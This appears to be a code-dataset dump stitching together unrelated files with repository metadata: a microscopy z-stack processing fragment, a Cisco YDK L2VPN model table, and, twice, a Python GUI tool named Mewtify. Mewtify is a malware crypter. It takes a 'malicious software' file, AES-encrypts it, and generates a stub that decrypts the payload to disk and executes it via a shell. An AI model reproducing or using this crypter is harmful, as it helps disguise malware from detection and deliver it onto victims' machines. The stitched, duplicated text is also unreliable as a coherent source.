stack = np.array([self.tiff.pages[ind].asarray() for ind in page_inds])
return stack
def project_stack(self, channel_name, axis, dst_filepath=None):
axis_inds = {'x': 1, 'y': 2, 'z': 0}
if axis not in axis_inds.keys():
raise ValueError("Axis must be one of 'x', 'y', or 'z'")
axis_ind = axis_inds[axis]
try:
proj = self.stacks[channel_name].max(axis=axis_ind)
minmax = {
'min_intensity': int(proj.min()),
'max_intensity': int(proj.max()),
}
self.global_metadata.update(self.tag_and_coerce_metadata(minmax, tag=channel_name))
if dst_filepath is not None:
tifffile.imsave(dst_filepath, proj)
except Exception:
self.event_logger(
'An error occured while %s-projecting the %s channel' % (axis, channel_name)
)
def calculate_z_profiles(self, channel):
stack = self.stacks[channel]
return {
'min': np.array([zslice.min() for zslice in stack]).astype(int),
'max': np.array([zslice.max() for zslice in stack]).astype(int),
'mean': np.array([zslice.mean() for zslice in stack]).astype(int),
'p9999': np.array([np.percentile(zslice, 99.99) for zslice in stack]).astype(int),
}
@staticmethod
def find_cell_layer(stack):
# z-profile of the mean intensity in the Hoechst channel
raw_profile = np.array([zslice.mean() for zslice in stack]).astype(float)
profile = raw_profile - raw_profile.mean()
profile[profile < 0] = 0
x = np.arange(len(profile))
center_of_mass = (profile * x).sum()/profile.sum()
return center_of_mass, raw_profile
def align_cell_layer(
self, cell_layer_bottom, cell_layer_top, step_size, bottom_wiggle_room=0
):
stacks = {}
result = {}
stack_405 = self.stacks[self.laser_405].copy()
stack_488 = self.stacks[self.laser_488].copy()
# hard-coded chromatic aberration offset in microns
# this is an empirically estimated median offset,
# obtained by inspecting z-stacks from nucleus-localized targets
chromatic_aberration_offset = 1.0
offset_ind = int(chromatic_aberration_offset/step_size)
stack_405 = stack_405[:-offset_ind, :, :]
stack_488 = stack_488[offset_ind:, :, :]
# estimate the cell layer center and round it the nearest z-slice
cell_layer_center, _ = self.find_cell_layer(stack_405)
cell_layer_center = np.round(cell_layer_center)
# absolute position, in number of z-slices, of the top and bottom of the cell layer
bottom_ind = int(np.floor(cell_layer_center + cell_layer_bottom/step_size))
top_ind = int(np.ceil(cell_layer_center + cell_layer_top/step_size))
# log some parameters (for debugging, mostly)
result['padded'] = False
result['stack_shape'] = stack_405.shape
result['crop_window'] = [bottom_ind, top_ind]
result['cell_layer_center'] = cell_layer_center
result['chromatic_aberration_offset'] = offset_ind
pad_depth = None
if bottom_ind < 0:
if abs(bottom_ind) <= np.round(bottom_wiggle_room/step_size):
pad_depth = abs(bottom_ind)
bottom_ind = 0
else:
result['error'] = 'The cell layer center was too close to the bottom of the stack'
return stacks, result
if top_ind >= stack_405.shape[0]:
result['error'] = 'The cell layer center was too close to the top of the stack'
return stacks, result
stack_405 = stack_405[bottom_ind:top_ind, :, :]
stack_488 = stack_488[bottom_ind:top_ind, :, :]
# pad the bottom of the stack if necessary
if pad_depth:
result['padded'] = True
result['pad_depth'] = pad_depth
padding = np.zeros((pad_depth, *stack_405.shape[1:]), dtype=stack_405.dtype)
stack_405 = np.concatenate((padding, stack_405), axis=0)
stack_488 = np.concatenate((padding, stack_488), axis=0)
stacks = {'405': stack_405, '488': stack_488}
return stacks, result
| true
| true
|
f7050ebecfade791d4ef5451036aca5787d01b52
| 3,395
|
py
|
Python
|
venv/venv/Scripts/Mewtify4Windows.py
|
FullstackAcademy/Mewtify
|
f6b23a6cf3da3f57bd27256e88786cc8c87e851d
|
[
"MIT"
] | null | null | null |
venv/venv/Scripts/Mewtify4Windows.py
|
FullstackAcademy/Mewtify
|
f6b23a6cf3da3f57bd27256e88786cc8c87e851d
|
[
"MIT"
] | null | null | null |
venv/venv/Scripts/Mewtify4Windows.py
|
FullstackAcademy/Mewtify
|
f6b23a6cf3da3f57bd27256e88786cc8c87e851d
|
[
"MIT"
] | 1
|
2021-12-17T01:06:42.000Z
|
2021-12-17T01:06:42.000Z
|
#!/usr/bin/env python3
import tkinter as tk
import binascii, pyaes, sys, base64, os.path, os
from tkinter import *
from pathlib import Path
from tkinter.font import Font
from tkinter.filedialog import askopenfilename
import secrets
import string
def main():
global entry3
input2 = entry3.get()
# Open file
file_name = malwarename # Malware path
new_file_name = input2 # Path to drop file
file = open(file_name, "rb")
file_data = file.read()
file.close()
# Crypt file data (Using AES)
key = bytearray(ran_string, 'UTF-8') # 16 bytes key - change for your key
aes = pyaes.AESModeOfOperationCTR(key)
crypto_data = aes.encrypt(file_data)
# Create Stub in Python File
stub = "import pyaes\n"
stub += "import sys\n"
stub += "crypto_data_hex = " + str(crypto_data) + "\n"
stub += "key = " + str(key) + "\n"
stub += "new_file_name = \"" + str(new_file_name) + "\"\n"
stub += "aes = pyaes.AESModeOfOperationCTR(key)\n"
stub += "crypto_data = crypto_data_hex\n"
stub += "decrypt_data = aes.decrypt(crypto_data)\n"
# Save file
stub += "new_file = open(new_file_name, 'wb')\n"
stub += "new_file.write(decrypt_data)\n"
stub += "new_file.close()\n"
# Execute file
stub += "import subprocess\n"
stub += 'proc = subprocess.Popen("python "+new_file_name, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n'
# Save the Stub
stub_name = str(input2)
stub_file = open(stub_name, "w")
stub_file.write(stub)
stub_file.close()
return
def fname():
global malwarename
malwarename = askopenfilename()
return malwarename
N=16
ran_string = ''.join(secrets.choice(string.ascii_uppercase + string.digits)
for i in range(N))
# GUI Dimensions
HEIGHT = 500
WIDTH = 700
root = tk.Tk()
# GUI NAME AND SIZE
root.title("MEWTIFY")
canvas = tk.Canvas(root, height=HEIGHT, width=WIDTH)
canvas.pack()
background_image = tk.PhotoImage(file='yaj.png')
background_label = tk.Label(root, image=background_image)
background_label.image= background_image
background_label.place(relwidth=1,relheight=1)
root.resizable(False, False)
# GUI HEADER
frame = tk.Frame(root, bg='#80C1FF', bd=5)
frame.place(relx=0.5, rely=0.05, relwidth=1, relheight=0.2, anchor='n')
label = tk.Label(frame, text="Welcome to Mewtify!", font=("-weight bold", 27), bg='#80C1FF')
label.place(relx=0.3, rely=0, relwidth=.5, relheight=1)
# INPUT 1
label2 = tk.Label(root, text="Malicious Software with full path:", anchor='w', font=15)
label2.place(relx=0, rely=0.35, relwidth=0.4, relheight=0.10)
filebutton = tk.Button(root, text="Select", font=40, command=fname)
filebutton.place(relx=.5, rely=0.35, relwidth=0.45, relheight=0.09)
# INPUT2
label3 = tk.Label(root, text="Name of Mutated Software:", anchor='w', font=15)
label3.place(relx=0, rely=0.5, relwidth=0.4, relheight=0.10)
entry3 = tk.Entry(root, font=40)
entry3.place(relx=.5, rely=0.5, relwidth=0.45, relheight=0.09)
entry3.focus_set()
# button mashing
button = tk.Button(root, text="MEWTIFY", bg="purple", font=40, command=main)
button.place(relx=0.3, rely=0.8, relwidth=0.45, relheight=0.15)
button1=tk.Button(root, text="click to exit", bg= "red", font =10,command=root.destroy)
button1.place(relx=.8, rely=0.9, relwidth=0.15, relheight=0.05)
root.mainloop()
| 33.613861
| 147
| 0.68218
|
import tkinter as tk
import binascii, pyaes, sys, base64, os.path, os
from tkinter import *
from pathlib import Path
from tkinter.font import Font
from tkinter.filedialog import askopenfilename
import secrets
import string
def main():
global entry3
input2 = entry3.get()
file_name = malwarename
new_file_name = input2
file = open(file_name, "rb")
file_data = file.read()
file.close()
key = bytearray(ran_string, 'UTF-8')
aes = pyaes.AESModeOfOperationCTR(key)
crypto_data = aes.encrypt(file_data)
stub = "import pyaes\n"
stub += "import sys\n"
stub += "crypto_data_hex = " + str(crypto_data) + "\n"
stub += "key = " + str(key) + "\n"
stub += "new_file_name = \"" + str(new_file_name) + "\"\n"
stub += "aes = pyaes.AESModeOfOperationCTR(key)\n"
stub += "crypto_data = crypto_data_hex\n"
stub += "decrypt_data = aes.decrypt(crypto_data)\n"
stub += "new_file = open(new_file_name, 'wb')\n"
stub += "new_file.write(decrypt_data)\n"
stub += "new_file.close()\n"
stub += "import subprocess\n"
stub += 'proc = subprocess.Popen("python "+new_file_name, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n'
stub_name = str(input2)
stub_file = open(stub_name, "w")
stub_file.write(stub)
stub_file.close()
return
def fname():
global malwarename
malwarename = askopenfilename()
return malwarename
N=16
ran_string = ''.join(secrets.choice(string.ascii_uppercase + string.digits)
for i in range(N))
HEIGHT = 500
WIDTH = 700
root = tk.Tk()
root.title("MEWTIFY")
canvas = tk.Canvas(root, height=HEIGHT, width=WIDTH)
canvas.pack()
background_image = tk.PhotoImage(file='yaj.png')
background_label = tk.Label(root, image=background_image)
background_label.image= background_image
background_label.place(relwidth=1,relheight=1)
root.resizable(False, False)
frame = tk.Frame(root, bg='#80C1FF', bd=5)
frame.place(relx=0.5, rely=0.05, relwidth=1, relheight=0.2, anchor='n')
label = tk.Label(frame, text="Welcome to Mewtify!", font=("-weight bold", 27), bg='#80C1FF')
label.place(relx=0.3, rely=0, relwidth=.5, relheight=1)
label2 = tk.Label(root, text="Malicious Software with full path:", anchor='w', font=15)
label2.place(relx=0, rely=0.35, relwidth=0.4, relheight=0.10)
filebutton = tk.Button(root, text="Select", font=40, command=fname)
filebutton.place(relx=.5, rely=0.35, relwidth=0.45, relheight=0.09)
label3 = tk.Label(root, text="Name of Mutated Software:", anchor='w', font=15)
label3.place(relx=0, rely=0.5, relwidth=0.4, relheight=0.10)
entry3 = tk.Entry(root, font=40)
entry3.place(relx=.5, rely=0.5, relwidth=0.45, relheight=0.09)
entry3.focus_set()
button = tk.Button(root, text="MEWTIFY", bg="purple", font=40, command=main)
button.place(relx=0.3, rely=0.8, relwidth=0.45, relheight=0.15)
button1=tk.Button(root, text="click to exit", bg= "red", font =10,command=root.destroy)
button1.place(relx=.8, rely=0.9, relwidth=0.15, relheight=0.05)
root.mainloop()
| true
| true
|
f7050ec21fb698ea4268b24c71bc79f1318a524a
| 436,547
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/_meta/_Cisco_IOS_XR_l2vpn_cfg.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/_meta/_Cisco_IOS_XR_l2vpn_cfg.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/_meta/_Cisco_IOS_XR_l2vpn_cfg.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
import re
import collections
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION
from ydk.errors import YPYError, YPYModelError
from ydk.providers._importer import _yang_ns
_meta_table = {
'FlowLabelTlvCodeEnum' : _MetaInfoEnum('FlowLabelTlvCodeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'17':'Y_17',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BackupDisableEnum' : _MetaInfoEnum('BackupDisableEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'never':'never',
'delay':'delay',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteTargetFormatEnum' : _MetaInfoEnum('BgpRouteTargetFormatEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'two-byte-as':'two_byte_as',
'four-byte-as':'four_byte_as',
'ipv4-address':'ipv4_address',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'LoadBalanceEnum' : _MetaInfoEnum('LoadBalanceEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'source-dest-mac':'source_dest_mac',
'source-dest-ip':'source_dest_ip',
'pseudowire-label':'pseudowire_label',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'InterworkingEnum' : _MetaInfoEnum('InterworkingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'ethernet':'ethernet',
'ipv4':'ipv4',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'PwSwitchingPointTlvEnum' : _MetaInfoEnum('PwSwitchingPointTlvEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'hide':'hide',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacAgingEnum' : _MetaInfoEnum('MacAgingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'absolute':'absolute',
'inactivity':'inactivity',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2Tpv3SequencingEnum' : _MetaInfoEnum('L2Tpv3SequencingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'off':'off',
'both':'both',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ErpPort1Enum' : _MetaInfoEnum('ErpPort1Enum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'port0':'port0',
'port1':'port1',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'InterfaceProfileEnum' : _MetaInfoEnum('InterfaceProfileEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'snoop':'snoop',
'dhcp-protocol':'dhcp_protocol',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2EncapsulationEnum' : _MetaInfoEnum('L2EncapsulationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'vlan':'vlan',
'ethernet':'ethernet',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'InterfaceTrafficFloodEnum' : _MetaInfoEnum('InterfaceTrafficFloodEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'traffic-flooding':'traffic_flooding',
'enable-flooding':'enable_flooding',
'disable-flooding':'disable_flooding',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2VpnLoggingEnum' : _MetaInfoEnum('L2VpnLoggingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'enable':'enable',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteTargetRoleEnum' : _MetaInfoEnum('BgpRouteTargetRoleEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'both':'both',
'import':'import_',
'export':'export',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ErpPortEnum' : _MetaInfoEnum('ErpPortEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'virtual':'virtual',
'interface':'interface',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacWithdrawBehaviorEnum' : _MetaInfoEnum('MacWithdrawBehaviorEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'legacy':'legacy',
'optimized':'optimized',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2TpCookieSizeEnum' : _MetaInfoEnum('L2TpCookieSizeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'zero':'zero',
'four':'four',
'eight':'eight',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'StormControlEnum' : _MetaInfoEnum('StormControlEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'unicast':'unicast',
'multicast':'multicast',
'broadcast':'broadcast',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2TpSignalingProtocolEnum' : _MetaInfoEnum('L2TpSignalingProtocolEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'l2tpv3':'l2tpv3',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'RplRoleEnum' : _MetaInfoEnum('RplRoleEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'owner':'owner',
'neighbor':'neighbor',
'next-neighbor':'next_neighbor',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacLimitActionEnum' : _MetaInfoEnum('MacLimitActionEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'flood':'flood',
'no-flood':'no_flood',
'shutdown':'shutdown',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'TypeOfServiceModeEnum' : _MetaInfoEnum('TypeOfServiceModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'reflect':'reflect',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacNotificationEnum' : _MetaInfoEnum('MacNotificationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'no-notif':'no_notif',
'syslog':'syslog',
'trap':'trap',
'syslog-snmp':'syslog_snmp',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2VpnVerificationEnum' : _MetaInfoEnum('L2VpnVerificationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'enable':'enable',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'LdpVplsIdEnum' : _MetaInfoEnum('LdpVplsIdEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'two-byte-as':'two_byte_as',
'ipv4-address':'ipv4_address',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacLearnEnum' : _MetaInfoEnum('MacLearnEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'default-learning':'default_learning',
'enable-learning':'enable_learning',
'disable-learning':'disable_learning',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'PortDownFlushEnum' : _MetaInfoEnum('PortDownFlushEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'port-down-flush':'port_down_flush',
'enable-port-down-flush':'enable_port_down_flush',
'disable-port-down-flush':'disable_port_down_flush',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2VpnCapabilityModeEnum' : _MetaInfoEnum('L2VpnCapabilityModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'high-mode':'high_mode',
'single-mode':'single_mode',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MplsSignalingProtocolEnum' : _MetaInfoEnum('MplsSignalingProtocolEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'ldp':'ldp',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteTargetEnum' : _MetaInfoEnum('BgpRouteTargetEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'no-stitching':'no_stitching',
'stitching':'stitching',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ControlWordEnum' : _MetaInfoEnum('ControlWordEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'enable':'enable',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'PreferredPathEnum' : _MetaInfoEnum('PreferredPathEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'te-tunnel':'te_tunnel',
'ip-tunnel':'ip_tunnel',
'tp-tunnel':'tp_tunnel',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BridgeDomainTransportModeEnum' : _MetaInfoEnum('BridgeDomainTransportModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'vlan-passthrough':'vlan_passthrough',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'FlowLabelLoadBalanceEnum' : _MetaInfoEnum('FlowLabelLoadBalanceEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'off':'off',
'receive':'receive',
'transmit':'transmit',
'both':'both',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteDistinguisherEnum' : _MetaInfoEnum('BgpRouteDistinguisherEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'auto':'auto',
'two-byte-as':'two_byte_as',
'four-byte-as':'four_byte_as',
'ipv4-address':'ipv4_address',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ErpapsEnum' : _MetaInfoEnum('ErpapsEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'interface':'interface',
'bridge-domain':'bridge_domain',
'xconnect':'xconnect',
'none':'none',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'VccvVerificationEnum' : _MetaInfoEnum('VccvVerificationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'lsp-ping':'lsp_ping',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'TransportModeEnum' : _MetaInfoEnum('TransportModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'ethernet':'ethernet',
'vlan':'vlan',
'vlan-passthrough':'vlan_passthrough',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MplsSequencingEnum' : _MetaInfoEnum('MplsSequencingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'off':'off',
'transmit':'transmit',
'receive':'receive',
'both':'both',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacSecureActionEnum' : _MetaInfoEnum('MacSecureActionEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'restrict':'restrict',
'none':'none',
'shutdown':'shutdown',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher' : {
'meta_info' : _MetaInfoClass('L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.PwRouting.PwRoutingBgp' : {
'meta_info' : _MetaInfoClass('L2Vpn.PwRouting.PwRoutingBgp',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-distinguisher', REFERENCE_CLASS, 'EvpnRouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'evpn_route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pw-routing-bgp',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.PwRouting' : {
'meta_info' : _MetaInfoClass('L2Vpn.PwRouting',
False,
[
_MetaInfoClassMember('pw-routing-bgp', REFERENCE_CLASS, 'PwRoutingBgp' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.PwRouting.PwRoutingBgp',
[], [],
''' Enable Autodiscovery BGP Pseudowire-routing BGP
''',
'pw_routing_bgp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-routing-global-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire-routing Global ID
''',
'pw_routing_global_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pw-routing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Neighbor' : {
'meta_info' : _MetaInfoClass('L2Vpn.Neighbor',
False,
[
_MetaInfoClassMember('ldp-flap', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable targetted LDP session flap action
''',
'ldp_flap',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'neighbor',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
